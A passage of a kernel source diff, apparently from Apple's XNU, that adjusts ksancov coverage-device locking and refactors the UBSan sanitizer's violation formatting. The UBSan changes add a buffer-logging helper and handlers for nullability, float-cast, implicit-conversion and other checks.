lck_rw_unlock_exclusive(&ksancov_devs_lck); /* * No need to lock d here as there is and will be no one having its @@ -558,10 +561,8 @@ ksancov_close(dev_t dev, int flags, int devtype, proc_t p) } if (d->mode == KS_MODE_TRACE && d->trace) { - os_atomic_sub(&active_devs, 1, relaxed); os_atomic_store(&d->trace->enabled, 0, relaxed); /* stop tracing */ } else if (d->mode == KS_MODE_COUNTERS && d->counters) { - os_atomic_sub(&active_devs, 1, relaxed); os_atomic_store(&d->counters->enabled, 0, relaxed); /* stop tracing */ } @@ -620,10 +621,10 @@ ksancov_ioctl(dev_t dev, unsigned long cmd, caddr_t _data, int fflag, proc_t p) struct ksancov_buf_desc *mcmd; void *data = (void *)_data; - lck_rw_lock_shared(ksancov_devs_lck); + lck_rw_lock_shared(&ksancov_devs_lck); ksancov_dev_t d = ksancov_devs[minor(dev)]; if (!d) { - lck_rw_unlock_shared(ksancov_devs_lck); + lck_rw_unlock_shared(&ksancov_devs_lck); return EINVAL; /* dev not open */ } @@ -666,7 +667,7 @@ ksancov_ioctl(dev_t dev, unsigned long cmd, caddr_t _data, int fflag, proc_t p) break; } - lck_rw_unlock_shared(ksancov_devs_lck); + lck_rw_unlock_shared(&ksancov_devs_lck); return ret; } @@ -736,7 +737,5 @@ ksancov_init_dev(void) ksancov_edgemap->nedges = (uint32_t)nedges; ksancov_edgemap->offset = KSANCOV_PC_OFFSET; - ksancov_devs_lck = lck_rw_alloc_init(&ksancov_lck_grp, LCK_ATTR_NULL); - return 0; } diff --git a/san/memintrinsics.h b/san/memintrinsics.h index 0c0a11ece..a40ce58a3 100644 --- a/san/memintrinsics.h +++ b/san/memintrinsics.h @@ -1,5 +1,5 @@ /* - * Copyright (c) 2016 Apple Inc. All rights reserved. + * Copyright (c) 2016-2020 Apple Inc. All rights reserved. * * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ * @@ -75,7 +75,14 @@ __nosan_strlcpy(char *dst, const char *src, size_t sz) static inline char * __nosan_strncpy(char *dst, const char *src, size_t sz) { +#ifdef __clang__ +#pragma clang diagnostic push +#pragma clang diagnostic ignored "-Wdeprecated-declarations" +#endif return strncpy(dst, src, sz); +#ifdef __clang__ +#pragma clang diagnostic pop +#endif } static inline size_t __nosan_strlcat(char *dst, const char *src, size_t sz) @@ -85,7 +92,14 @@ __nosan_strlcat(char *dst, const char *src, size_t sz) static inline char * __nosan_strncat(char *dst, const char *src, size_t sz) { +#ifdef __clang__ +#pragma clang diagnostic push +#pragma clang diagnostic ignored "-Wdeprecated-declarations" +#endif return strncat(dst, src, sz); +#ifdef __clang__ +#pragma clang diagnostic pop +#endif } static inline size_t __nosan_strnlen(const char *src, size_t sz) diff --git a/san/ubsan.c b/san/ubsan.c index d8e42d708..d245d424c 100644 --- a/san/ubsan.c +++ b/san/ubsan.c @@ -28,6 +28,7 @@ #include #include +#include #include #include "ubsan.h" @@ -35,14 +36,27 @@ static const bool ubsan_print = false; static const uint32_t line_acquired = 0x80000000UL; static const char *get_type_check_kind(uint8_t kind); -static size_t -format_loc(struct san_src_loc *loc, char *dst, size_t sz) +static void +ubsan_buf_log(struct ubsan_buf *ub, const char *fmt, ...) { - return scnprintf(dst, sz, ", file:\"%s\", line:%d, column:%d },\n", - loc->filename, - loc->line & ~line_acquired, - loc->col - ); + va_list ap; + + va_start(ap, fmt); + int n = vscnprintf(ub->ub_buf + ub->ub_logged, ub->ub_buf_size - ub->ub_logged, fmt, ap); + va_end(ap); + + ub->ub_logged += n; + assert(ub->ub_logged <= ub->ub_buf_size); +} + +static void +ubsan_buf_log_loc(struct ubsan_buf *ub, const char *desc, struct san_src_loc *loc) +{ + ubsan_buf_log(ub, "%s:{ file:\"%s\", line:%d, column:%d }", + desc, + loc->filename, + loc->line & ~line_acquired, + loc->col); } /* @@ -70,33 +84,30 @@ overflow_str[] = { NULL }; -static size_t -format_overflow(struct ubsan_violation *v, char *buf, size_t sz) +static void +format_overflow(struct ubsan_violation *v, struct ubsan_buf *ub) { struct san_type_desc *ty = v->overflow->ty; - return scnprintf(buf, sz, - "problem:\"%s overflow\", op:\"%s\", ty:\"%s\", width:%d, lhs:0x%llx, rhs:0x%llx, ", - ty->issigned ? "signed" : "unsigned", - overflow_str[v->ubsan_type], - ty->name, - 1 << ty->width, - v->lhs, - v->rhs - ); + ubsan_buf_log(ub, + "problem:\"%s overflow\", op:\"%s\", ty:\"%s\", width:%d, lhs:0x%llx, rhs:0x%llx", + ty->issigned ? "signed" : "unsigned", + overflow_str[v->ubsan_type], + ty->name, + 1 << ty->width, + v->lhs, + v->rhs + ); } -static size_t -format_shift(struct ubsan_violation *v, char *buf, size_t sz) +static void +format_shift(struct ubsan_violation *v, struct ubsan_buf *ub) { - size_t n = 0; struct san_type_desc *l = v->shift->lhs_t; struct san_type_desc *r = v->shift->rhs_t; - n += scnprintf(buf + n, sz - n, "problem:\"bad shift\", "); - n += scnprintf(buf + n, sz - n, "lhs:0x%llx, lty:\"%s\", lsigned:%d, lwidth:%d, ", v->lhs, l->name, l->issigned, 1 << l->width); - n += scnprintf(buf + n, sz - n, "rhs:0x%llx, rty:\"%s\", rsigned:%d, rwidth:%d, ", v->rhs, r->name, r->issigned, 1 << r->width); - - return n; + ubsan_buf_log(ub, "problem:\"bad shift\", "); + ubsan_buf_log(ub, "lhs:0x%llx, lty:\"%s\", lsigned:%d, lwidth:%d, ", v->lhs, l->name, l->issigned, 1 << l->width); + ubsan_buf_log(ub, "rhs:0x%llx, rty:\"%s\", rsigned:%d, rwidth:%d", v->rhs, r->name, r->issigned, 1 << r->width); } static const char * const @@ -114,89 +125,196 @@ get_type_check_kind(uint8_t kind) : "some"; } -static size_t -format_type_mismatch(struct ubsan_violation *v, char *buf, size_t sz) +static void +format_type_mismatch(struct ubsan_violation *v, struct ubsan_buf *ub) { - size_t n = 0; size_t alignment = 1 << v->align->align; void *ptr = (void*)v->lhs; - const char * kind = get_type_check_kind(v->align->kind); + const char *kind = get_type_check_kind(v->align->kind); + if (NULL == ptr) { //null pointer use - n += scnprintf(buf + n, sz - n, "problem:\"%s NULL pointer\", ty:\"%s\", ", kind, v->align->ty->name); + ubsan_buf_log(ub, "problem:\"%s NULL pointer\", ty:\"%s\"", kind, v->align->ty->name); } else if (alignment && ((uintptr_t)ptr & (alignment - 1))) { //misaligned pointer use - n += scnprintf(buf + n, sz - n, "problem:\"%s mis-aligned\", address:%p, ty:\"%s\", ", kind, (void*)v->lhs, v->align->ty->name); - n += scnprintf(buf + n, sz - n, "required_alignment:%d, ", 1 << v->align->align); + ubsan_buf_log(ub, "problem:\"%s mis-aligned\", address:%p, ty:\"%s\", ", + kind, (void*)v->lhs, v->align->ty->name); + ubsan_buf_log(ub, "required_alignment:%d", 1 << v->align->align); } else { //insufficient object size - n += scnprintf(buf + n, sz - n, "problem:\"%s insufficient object size\", ty:\"%s\", address:%p, ", + ubsan_buf_log(ub, "problem:\"%s insufficient object size\", ty:\"%s\", address:%p", kind, v->align->ty->name, ptr); } - - return n; } -static size_t -format_oob(struct ubsan_violation *v, char *buf, size_t sz) +static void +format_oob(struct ubsan_violation *v, struct ubsan_buf *ub) { - size_t n = 0; struct san_type_desc *aty = v->oob->array_ty; struct san_type_desc *ity = v->oob->index_ty; uintptr_t idx = v->lhs; - n += scnprintf(buf + n, sz - n, "problem:\"OOB array access\", "); - n += scnprintf(buf + n, sz - n, "idx:%ld, ", idx); - n += scnprintf(buf + n, sz - n, "aty:\"%s\", asigned:%d, awidth:%d, ", aty->name, aty->issigned, 1 << aty->width); - n += scnprintf(buf + n, sz - n, "ity:\"%s\", isigned:%d, iwidth:%d, ", ity->name, ity->issigned, 1 << ity->width); + ubsan_buf_log(ub, "problem:\"OOB array access\", "); + ubsan_buf_log(ub, "idx:%ld, ", idx); + ubsan_buf_log(ub, "aty:\"%s\", asigned:%d, awidth:%d, ", aty->name, aty->issigned, 1 << aty->width); + ubsan_buf_log(ub, "ity:\"%s\", isigned:%d, iwidth:%d", ity->name, ity->issigned, 1 << ity->width); +} - return n; +static void +format_nullability_arg(struct ubsan_violation *v, struct ubsan_buf *ub) +{ + struct ubsan_nullability_arg_desc *data = v->nonnull_arg; + + const int arg_index = data->arg_index; + const char *attr_type = v->lhs ? "nonnull attribute" : "_Nonnull annotation"; + + ubsan_buf_log(ub, "problem:\"null in argument %d declared with %s\", ", arg_index, attr_type); + ubsan_buf_log_loc(ub, "declared", &data->attr_loc); } -static size_t -format_load_invalid_value(struct ubsan_violation *v, char *buf, size_t sz) +static void +format_nonnull_return(struct ubsan_violation *v, struct ubsan_buf *ub) { - return scnprintf(buf, sz, "problem:\"invalid value load\", type:\"%s\", value:0x%llx", - v->invalid->type->name, v->lhs); + struct san_src_loc *declaration = (struct san_src_loc *)v->rhs; + const char *return_type = v->lhs ? "returns_nonnull attribute" : "_Nonnull return type annotation"; + + ubsan_buf_log(ub, "problem:\"null returned from function declared with %s\", ", return_type); + ubsan_buf_log_loc(ub, "declared", declaration); } -size_t -ubsan_format(struct ubsan_violation *v, char *buf, size_t sz) +static void +format_load_invalid_value(struct ubsan_violation *v, struct ubsan_buf *ub) { - size_t n = scnprintf(buf, sz, "{ "); + ubsan_buf_log(ub, "problem:\"invalid value load\", type:\"%s\", value:0x%llx", + v->invalid->type->name, v->lhs); +} + +static void +format_missing_return(struct ubsan_violation *v __unused, struct ubsan_buf *ub) +{ + ubsan_buf_log(ub, "problem:\"no value returned from value-returning function\""); +} + +static void +format_float_cast_overflow(struct ubsan_violation *v, struct ubsan_buf *ub) +{ + struct ubsan_float_desc *data = v->flt; + /* + * Cannot print out offending value (e.g. using %A, %f and so on) as kernel logging + * does not support float types (yet). + */ + ubsan_buf_log(ub, "problem:\"%s type value outside the range of %s\"", + data->type_from->name, data->type_to->name); +} + +static const char * +get_implicit_conv_type(unsigned char kind) +{ + static const char * const conv_types[] = { + "integer truncation", + "unsigned integer truncation", + "signed integer truncation", + "integer sign change", + "signed integer truncation or sign change" + }; + static const size_t conv_types_cnt = sizeof(conv_types) / sizeof(conv_types[0]); + + return kind < conv_types_cnt ? conv_types[kind] : "unknown implicit integer conversion"; +} + +static void +format_implicit_conversion(struct ubsan_violation *v, struct ubsan_buf *ub) +{ + struct ubsan_implicit_conv_desc *data = v->implicit; + struct san_type_desc *from = data->type_from; + struct san_type_desc *to = data->type_to; + + ubsan_buf_log(ub, "problem:\"%s\", ", get_implicit_conv_type(data->kind)); + ubsan_buf_log(ub, "src value:%#llx type:\"%s\", signed:%d, width:%d, ", + v->lhs, from->name, from->issigned, 1 << from->width); + ubsan_buf_log(ub, "dst value:%#llx type:\"%s\", signed:%d, width:%d", + v->rhs, to->name, to->issigned, 1 << to->width); +} + +static void +format_function_type_mismatch(struct ubsan_violation *v, struct ubsan_buf *ub) +{ + struct ubsan_func_type_mismatch_desc *data = v->func_mismatch; + ubsan_buf_log(ub, "problem:\"indirect function call through %p of a wrong type %s\"", + (void *)v->lhs, data->type->name); +} + +static void +format_vla_bound_not_positive(struct ubsan_violation *v, struct ubsan_buf *ub) +{ + struct ubsan_vla_bound_desc *data = v->vla_bound; + ubsan_buf_log(ub, "problem:\"VLA %s bound %#llx not positive\"", data->type->name, v->lhs); +} + +static void +format_invalid_builtin(struct ubsan_violation *v, struct ubsan_buf *ub) +{ + ubsan_buf_log(ub, "problem:\"passing invalid zero argument to %s\"", + v->invalid_builtin->kind == 0 ? "ctz()" : "clz()"); +} + +void +ubsan_format(struct ubsan_violation *v, struct ubsan_buf *ub) +{ + ubsan_buf_log(ub, "{ "); switch (v->ubsan_type) { case UBSAN_OVERFLOW_add ... UBSAN_OVERFLOW_negate: - n += format_overflow(v, buf + n, sz - n); + format_overflow(v, ub); break; case UBSAN_UNREACHABLE: - n += scnprintf(buf + n, sz - n, "problem:\"unreachable\", "); + ubsan_buf_log(ub, "problem:\"unreachable\", "); break; case UBSAN_SHIFT: - n += format_shift(v, buf + n, sz - n); + format_shift(v, ub); break; case UBSAN_TYPE_MISMATCH: - n += format_type_mismatch(v, buf + n, sz - n); + format_type_mismatch(v, ub); break; case UBSAN_POINTER_OVERFLOW: - n += scnprintf(buf + n, sz - n, "problem:\"pointer overflow\", before:0x%llx, after:0x%llx, ", v->lhs, v->rhs); + ubsan_buf_log(ub, "problem:\"pointer overflow\", before:0x%llx, after:0x%llx", v->lhs, v->rhs); break; case UBSAN_OOB: - n += format_oob(v, buf + n, sz - n); + format_oob(v, ub); break; - case UBSAN_LOAD_INVALID_VALUE: - n += format_load_invalid_value(v, buf + n, sz - n); + case UBSAN_NULLABILITY_ARG: + format_nullability_arg(v, ub); + break; + case UBSAN_NULLABILITY_RETURN: + format_nonnull_return(v, ub); + break; + case UBSAN_MISSING_RETURN: + format_missing_return(v, ub); + break; + case UBSAN_FLOAT_CAST_OVERFLOW: + format_float_cast_overflow(v, ub); + break; + case UBSAN_IMPLICIT_CONVERSION: + format_implicit_conversion(v, ub); break; - case UBSAN_GENERIC: - n += scnprintf(buf + n, sz - n, "problem:\"generic\", function:\"%s\", ", v->func); + case UBSAN_FUNCTION_TYPE_MISMATCH: + format_function_type_mismatch(v, ub); + break; + case UBSAN_VLA_BOUND_NOT_POSITIVE: + format_vla_bound_not_positive(v, ub); + break; + case UBSAN_INVALID_BUILTIN: + format_invalid_builtin(v, ub); + break; + case UBSAN_LOAD_INVALID_VALUE: + format_load_invalid_value(v, ub); break; default: panic("unknown violation"); } - n += format_loc(v->loc, buf + n, sz - n); - - return n; + ubsan_buf_log_loc(ub, ", found", v->loc); + ubsan_buf_log(ub, " },\n"); } enum UBFatality { Fatal, FleshWound }; @@ -212,10 +330,13 @@ ubsan_handle(struct ubsan_violation *v, enum UBFatality fatality) ubsan_log_append(v); if (ubsan_print || (fatality == Fatal)) { - const size_t sz = 256; - static char buf[sz]; - buf[0] = '\0'; - ubsan_format(v, buf, sz); + static char buf[256] = { 0 }; + struct ubsan_buf ubsan_buf = { + .ub_logged = 0, + .ub_buf_size = sizeof(buf), + .ub_buf = buf + }; + ubsan_format(v, &ubsan_buf); printf("UBSan: %s", buf); } } @@ -299,6 +420,146 @@ __ubsan_handle_out_of_bounds_abort(struct ubsan_oob_desc *desc, uint64_t idx) ubsan_handle(&v, Fatal); } +void +__ubsan_handle_nullability_arg(struct ubsan_nullability_arg_desc *desc) +{ + struct ubsan_violation v = { UBSAN_NULLABILITY_ARG, 0, 0, .nonnull_arg = desc, &desc->loc }; + ubsan_handle(&v, FleshWound); +} + +void +__ubsan_handle_nullability_arg_abort(struct ubsan_nullability_arg_desc *desc) +{ + struct ubsan_violation v = { UBSAN_NULLABILITY_ARG, 0, 0, .nonnull_arg = desc, &desc->loc }; + ubsan_handle(&v, Fatal); +} + +void +__ubsan_handle_nonnull_arg(struct ubsan_nullability_arg_desc *desc) +{ + struct ubsan_violation v = { UBSAN_NULLABILITY_ARG, 1, 0, .nonnull_arg = desc, &desc->loc }; + ubsan_handle(&v, FleshWound); +} + +void +__ubsan_handle_nonnull_arg_abort(struct ubsan_nullability_arg_desc *desc) +{ + struct ubsan_violation v = { UBSAN_NULLABILITY_ARG, 1, 0, .nonnull_arg = desc, &desc->loc }; + ubsan_handle(&v, Fatal); +} + +void +__ubsan_handle_nullability_return_v1(struct ubsan_nullability_ret_desc *desc, uint64_t declaration) +{ + struct ubsan_violation v = { UBSAN_NULLABILITY_RETURN, 0, (uint64_t)&desc->loc, .nonnull_ret = desc, (struct san_src_loc *)declaration }; + ubsan_handle(&v, FleshWound); +} + +void +__ubsan_handle_nullability_return_v1_abort(struct ubsan_nullability_ret_desc *desc, uint64_t declaration) +{ + struct ubsan_violation v = { UBSAN_NULLABILITY_RETURN, 0, (uint64_t)&desc->loc, .nonnull_ret = desc, (struct san_src_loc *)declaration }; + ubsan_handle(&v, Fatal); +} + +void +__ubsan_handle_nonnull_return_v1(struct ubsan_nullability_ret_desc *desc, uint64_t declaration) +{ + struct ubsan_violation v = { UBSAN_NULLABILITY_RETURN, 1, (uint64_t)&desc->loc, .nonnull_ret = desc, (struct san_src_loc *)declaration }; + ubsan_handle(&v, FleshWound); +} + +void +__ubsan_handle_nonnull_return_v1_abort(struct ubsan_nullability_ret_desc *desc, uint64_t declaration) +{ + struct ubsan_violation v = { UBSAN_NULLABILITY_RETURN, 1, (uint64_t)&desc->loc, .nonnull_ret = desc, (struct san_src_loc *)declaration }; + ubsan_handle(&v, Fatal); +} + +void +__ubsan_handle_missing_return(struct ubsan_missing_ret_desc *desc) +{ + struct ubsan_violation v = { UBSAN_MISSING_RETURN, 0, 0, .missing_ret = desc, &desc->loc }; + ubsan_handle(&v, Fatal); +} + +void +__ubsan_handle_missing_return_abort(struct ubsan_missing_ret_desc *desc) +{ + struct ubsan_violation v = { UBSAN_MISSING_RETURN, 0, 0, .missing_ret = desc, &desc->loc }; + ubsan_handle(&v, Fatal); +} + +void +__ubsan_handle_float_cast_overflow(struct ubsan_float_desc *desc, uint64_t value) +{ + struct ubsan_violation v = { UBSAN_FLOAT_CAST_OVERFLOW, value, 0, .flt = desc, &desc->loc }; + ubsan_handle(&v, Fatal); +} + +void +__ubsan_handle_float_cast_overflow_abort(struct ubsan_float_desc *desc, uint64_t value) +{ + struct ubsan_violation v = { UBSAN_FLOAT_CAST_OVERFLOW, value, 0, .flt = desc, &desc->loc }; + ubsan_handle(&v, Fatal); +} + +void +__ubsan_handle_implicit_conversion(struct ubsan_implicit_conv_desc *desc, uint64_t from, uint64_t to) +{ + struct ubsan_violation v = { UBSAN_IMPLICIT_CONVERSION, from, to, .implicit = desc, &desc->loc }; + ubsan_handle(&v, Fatal); +} + +void +__ubsan_handle_implicit_conversion_abort(struct ubsan_implicit_conv_desc *desc, uint64_t from, uint64_t to) +{ + struct ubsan_violation v = { UBSAN_IMPLICIT_CONVERSION, from, to, .implicit = desc, &desc->loc }; + ubsan_handle(&v, Fatal); +} + +void +__ubsan_handle_function_type_mismatch(struct ubsan_func_type_mismatch_desc *desc, uint64_t func) +{ + struct ubsan_violation v = { UBSAN_FUNCTION_TYPE_MISMATCH, func, 0, .func_mismatch = desc, &desc->loc }; + ubsan_handle(&v, Fatal); +} + +void +__ubsan_handle_function_type_mismatch_abort(struct ubsan_func_type_mismatch_desc *desc, uint64_t func) +{ + struct ubsan_violation v = { UBSAN_FUNCTION_TYPE_MISMATCH, func, 0, .func_mismatch = desc, &desc->loc }; + ubsan_handle(&v, Fatal); +} + +void +__ubsan_handle_vla_bound_not_positive(struct ubsan_vla_bound_desc *desc, uint64_t length) +{ + struct ubsan_violation v = { UBSAN_VLA_BOUND_NOT_POSITIVE, length, 0, .vla_bound = desc, &desc->loc }; + ubsan_handle(&v, Fatal); +} + +void +__ubsan_handle_vla_bound_not_positive_abort(struct ubsan_vla_bound_desc *desc, uint64_t length) +{ + struct ubsan_violation v = { UBSAN_VLA_BOUND_NOT_POSITIVE, length, 0, .vla_bound = desc, &desc->loc }; + ubsan_handle(&v, Fatal); +} + +void +__ubsan_handle_invalid_builtin(struct ubsan_invalid_builtin *desc) +{ + struct ubsan_violation v = { UBSAN_INVALID_BUILTIN, 0, 0, .invalid_builtin = desc, &desc->loc }; + ubsan_handle(&v, Fatal); +} + +void +__ubsan_handle_invalid_builtin_abort(struct ubsan_invalid_builtin *desc) +{ + struct ubsan_violation v = { UBSAN_INVALID_BUILTIN, 0, 0, .invalid_builtin = desc, &desc->loc }; + ubsan_handle(&v, Fatal); +} + void __ubsan_handle_load_invalid_value(struct ubsan_load_invalid_desc *desc, uint64_t invalid_value) { @@ -312,26 +573,3 @@ __ubsan_handle_load_invalid_value_abort(struct ubsan_load_invalid_desc *desc, ui struct ubsan_violation v = { UBSAN_LOAD_INVALID_VALUE, invalid_value, 0, .invalid = desc, &desc->loc }; ubsan_handle(&v, Fatal); } - -#define DEFINE_GENERIC(check) \ - void __ubsan_handle_##check (struct san_src_loc* loc) \ - { \ - struct ubsan_violation v = { UBSAN_GENERIC, 0, 0, .func = __func__, loc }; \ - ubsan_handle(&v, FleshWound); \ - } \ - void __ubsan_handle_##check##_abort(struct san_src_loc* loc) \ - { \ - struct ubsan_violation v = { UBSAN_GENERIC, 0, 0, .func = __func__, loc }; \ - ubsan_handle(&v, Fatal); \ - } - -DEFINE_GENERIC(invalid_builtin) -DEFINE_GENERIC(nonnull_arg) -DEFINE_GENERIC(vla_bound_not_positive) -DEFINE_GENERIC(float_cast_overflow) -DEFINE_GENERIC(function_type_mismatch) -DEFINE_GENERIC(missing_return) -DEFINE_GENERIC(nonnull_return) -DEFINE_GENERIC(nullability_arg) -DEFINE_GENERIC(nullability_return) -DEFINE_GENERIC(implicit_conversion) diff --git a/san/ubsan.h b/san/ubsan.h index e24045ab2..36dc50c22 100644 --- a/san/ubsan.h +++ b/san/ubsan.h @@ -89,6 +89,48 @@ struct ubsan_load_invalid_desc { struct san_type_desc *type; }; +struct ubsan_nullability_arg_desc { + struct san_src_loc loc; + struct san_src_loc attr_loc; + int arg_index; +}; + +struct ubsan_nullability_ret_desc { + struct san_src_loc loc; +}; + +struct ubsan_missing_ret_desc { + struct san_src_loc loc; +}; + +struct ubsan_float_desc { + struct san_src_loc loc; + struct san_type_desc *type_from; + struct san_type_desc *type_to; +}; + +struct ubsan_implicit_conv_desc { + struct san_src_loc loc; + struct san_type_desc *type_from; + struct san_type_desc *type_to; + unsigned char kind; +}; + +struct ubsan_func_type_mismatch_desc { + struct san_src_loc loc; + struct san_type_desc *type; +}; + +struct ubsan_vla_bound_desc { + struct san_src_loc loc; + struct san_type_desc *type; +}; + +struct ubsan_invalid_builtin { + struct san_src_loc loc; + unsigned char kind; +}; + enum { UBSAN_OVERFLOW_add = 1, UBSAN_OVERFLOW_sub, @@ -100,10 +142,17 @@ enum { UBSAN_ALIGN, UBSAN_POINTER_OVERFLOW, UBSAN_OOB, - UBSAN_GENERIC, UBSAN_TYPE_MISMATCH, UBSAN_LOAD_INVALID_VALUE, - UBSAN_VIOLATION_MAX, + UBSAN_NULLABILITY_ARG, + UBSAN_NULLABILITY_RETURN, + UBSAN_MISSING_RETURN, + UBSAN_FLOAT_CAST_OVERFLOW, + UBSAN_IMPLICIT_CONVERSION, + UBSAN_FUNCTION_TYPE_MISMATCH, + UBSAN_VLA_BOUND_NOT_POSITIVE, + UBSAN_INVALID_BUILTIN, + UBSAN_VIOLATION_MAX }; struct ubsan_violation { @@ -118,13 +167,27 @@ struct ubsan_violation { struct ubsan_ptroverflow_desc *ptroverflow; struct ubsan_oob_desc *oob; struct ubsan_load_invalid_desc *invalid; + struct ubsan_nullability_arg_desc *nonnull_arg; + struct ubsan_nullability_ret_desc *nonnull_ret; + struct ubsan_missing_ret_desc *missing_ret; + struct ubsan_float_desc *flt; + struct ubsan_implicit_conv_desc *implicit; + struct ubsan_func_type_mismatch_desc *func_mismatch; + struct ubsan_vla_bound_desc *vla_bound; + struct ubsan_invalid_builtin *invalid_builtin; const char *func; }; struct san_src_loc *loc; }; +struct ubsan_buf { + size_t ub_logged; + size_t ub_buf_size; + char *ub_buf; +}; + void ubsan_log_append(struct ubsan_violation *); -size_t ubsan_format(struct ubsan_violation *, char *buf, size_t sz); +void ubsan_format(struct ubsan_violation *, struct ubsan_buf *); /* * UBSan ABI @@ -135,10 +198,30 @@ void __ubsan_handle_add_overflow_abort(struct ubsan_overflow_desc *, uint64_t lh void __ubsan_handle_builtin_unreachable(struct ubsan_unreachable_desc *); void __ubsan_handle_divrem_overflow(struct ubsan_overflow_desc *, uint64_t lhs, uint64_t rhs); void __ubsan_handle_divrem_overflow_abort(struct ubsan_overflow_desc *, uint64_t lhs, uint64_t rhs); +void __ubsan_handle_float_cast_overflow(struct ubsan_float_desc *, uint64_t); +void __ubsan_handle_float_cast_overflow_abort(struct ubsan_float_desc *, uint64_t); +void __ubsan_handle_function_type_mismatch(struct ubsan_func_type_mismatch_desc*, uint64_t); +void __ubsan_handle_function_type_mismatch_abort(struct ubsan_func_type_mismatch_desc *, uint64_t); +void __ubsan_handle_implicit_conversion(struct ubsan_implicit_conv_desc *, uint64_t, uint64_t); +void __ubsan_handle_implicit_conversion_abort(struct ubsan_implicit_conv_desc *, uint64_t, uint64_t); +void __ubsan_handle_invalid_builtin(struct ubsan_invalid_builtin *); +void __ubsan_handle_invalid_builtin_abort(struct ubsan_invalid_builtin *); +void __ubsan_handle_load_invalid_value(struct ubsan_load_invalid_desc *, uint64_t); +void __ubsan_handle_load_invalid_value_abort(struct ubsan_load_invalid_desc *, uint64_t); +void __ubsan_handle_missing_return(struct ubsan_missing_ret_desc *); +void __ubsan_handle_missing_return_abort(struct ubsan_missing_ret_desc *); void __ubsan_handle_mul_overflow(struct ubsan_overflow_desc *, uint64_t lhs, uint64_t rhs); void __ubsan_handle_mul_overflow_abort(struct ubsan_overflow_desc *, uint64_t lhs, uint64_t rhs); void __ubsan_handle_negate_overflow(struct ubsan_overflow_desc *, uint64_t lhs, uint64_t rhs); void __ubsan_handle_negate_overflow_abort(struct ubsan_overflow_desc *, uint64_t lhs, uint64_t rhs); +void __ubsan_handle_nonnull_arg(struct ubsan_nullability_arg_desc *); +void __ubsan_handle_nonnull_arg_abort(struct ubsan_nullability_arg_desc *); +void __ubsan_handle_nonnull_return_v1(struct ubsan_nullability_ret_desc *, uint64_t); +void __ubsan_handle_nonnull_return_v1_abort(struct ubsan_nullability_ret_desc *, uint64_t); +void __ubsan_handle_nullability_arg(struct ubsan_nullability_arg_desc *); +void __ubsan_handle_nullability_arg_abort(struct ubsan_nullability_arg_desc *); +void __ubsan_handle_nullability_return_v1(struct ubsan_nullability_ret_desc *, uint64_t); +void __ubsan_handle_nullability_return_v1_abort(struct ubsan_nullability_ret_desc *, uint64_t); void __ubsan_handle_out_of_bounds(struct ubsan_oob_desc *, uint64_t idx); void __ubsan_handle_out_of_bounds_abort(struct ubsan_oob_desc *, uint64_t idx); void __ubsan_handle_pointer_overflow(struct ubsan_ptroverflow_desc *, uint64_t lhs, uint64_t rhs); @@ -149,29 +232,7 @@ void __ubsan_handle_sub_overflow(struct ubsan_overflow_desc *, uint64_t lhs, uin void __ubsan_handle_sub_overflow_abort(struct ubsan_overflow_desc *, uint64_t lhs, uint64_t rhs); void __ubsan_handle_type_mismatch_v1(struct ubsan_align_desc *, uint64_t val); void __ubsan_handle_type_mismatch_v1_abort(struct ubsan_align_desc *, uint64_t val); -void __ubsan_handle_load_invalid_value(struct ubsan_load_invalid_desc *, uint64_t); -void __ubsan_handle_load_invalid_value_abort(struct ubsan_load_invalid_desc *, uint64_t); - -/* currently unimplemented */ -void __ubsan_handle_float_cast_overflow(struct san_src_loc *); -void __ubsan_handle_float_cast_overflow_abort(struct san_src_loc *); -void __ubsan_handle_function_type_mismatch(struct san_src_loc *); -void __ubsan_handle_function_type_mismatch_abort(struct san_src_loc *); -void __ubsan_handle_implicit_conversion(struct san_src_loc *); -void __ubsan_handle_implicit_conversion_abort(struct san_src_loc *); -void __ubsan_handle_invalid_builtin(struct san_src_loc *); -void __ubsan_handle_invalid_builtin_abort(struct san_src_loc *); -void __ubsan_handle_missing_return(struct san_src_loc *); -void __ubsan_handle_missing_return_abort(struct san_src_loc *); -void __ubsan_handle_nonnull_arg(struct san_src_loc *); -void __ubsan_handle_nonnull_arg_abort(struct san_src_loc *); -void __ubsan_handle_nonnull_return(struct san_src_loc *); -void __ubsan_handle_nonnull_return_abort(struct san_src_loc *); -void __ubsan_handle_nullability_arg(struct san_src_loc *); -void __ubsan_handle_nullability_arg_abort(struct san_src_loc *); -void __ubsan_handle_nullability_return(struct san_src_loc *); -void __ubsan_handle_nullability_return_abort(struct san_src_loc *); -void __ubsan_handle_vla_bound_not_positive(struct san_src_loc *); -void __ubsan_handle_vla_bound_not_positive_abort(struct san_src_loc *); +void __ubsan_handle_vla_bound_not_positive(struct ubsan_vla_bound_desc *, uint64_t); +void __ubsan_handle_vla_bound_not_positive_abort(struct ubsan_vla_bound_desc *, uint64_t); #endif /* _UBSAN_H_ */ diff --git a/san/ubsan_log.c b/san/ubsan_log.c index 0c77d4ce9..aedd9f94e 100644 --- a/san/ubsan_log.c +++ b/san/ubsan_log.c @@ -111,24 +111,26 @@ sysctl_ubsan_log_dump SYSCTL_HANDLER_ARGS os_atomic_thread_fence(seq_cst); tail = os_atomic_load(&ubsan_log_tail, relaxed); - char *buf; - size_t n = 0; - int err; - if (tail == head) { return 0; /* log is empty */ } - buf = kheap_alloc(KHEAP_TEMP, sz, Z_WAITOK | Z_ZERO); + char *buf = kheap_alloc(KHEAP_TEMP, sz, Z_WAITOK | Z_ZERO); if (!buf) { return 0; } + struct ubsan_buf ubsan_buf = { + .ub_logged = 0, + .ub_buf_size = sz, + .ub_buf = buf + }; + for (size_t i = tail; i != head; i = next_entry(i)) { - n += ubsan_format(&ubsan_log[i], buf + n, sz - n); + ubsan_format(&ubsan_log[i], &ubsan_buf); } - err = SYSCTL_OUT(req, buf, n); + int err = SYSCTL_OUT(req, buf, ubsan_buf.ub_logged); kheap_free(KHEAP_TEMP, buf, sz); return err; diff --git a/security/mac_base.c b/security/mac_base.c index dd3da27a1..7ac90d164 100644 --- a/security/mac_base.c +++ b/security/mac_base.c @@ -122,7 +122,7 @@ #if CONFIG_MACF SYSCTL_NODE(, OID_AUTO, security, CTLFLAG_RW | CTLFLAG_LOCKED, 0, "Security Controls"); -SYSCTL_NODE(_security, OID_AUTO, mac, CTLFLAG_RW | CTLFLAG_LOCKED, 0, +SYSCTL_EXTENSIBLE_NODE(_security, OID_AUTO, mac, CTLFLAG_RW | CTLFLAG_LOCKED, 0, "TrustedBSD MAC policy controls"); /* @@ -240,7 +240,8 @@ SYSCTL_UINT(_security_mac, OID_AUTO, vnode_enforce, 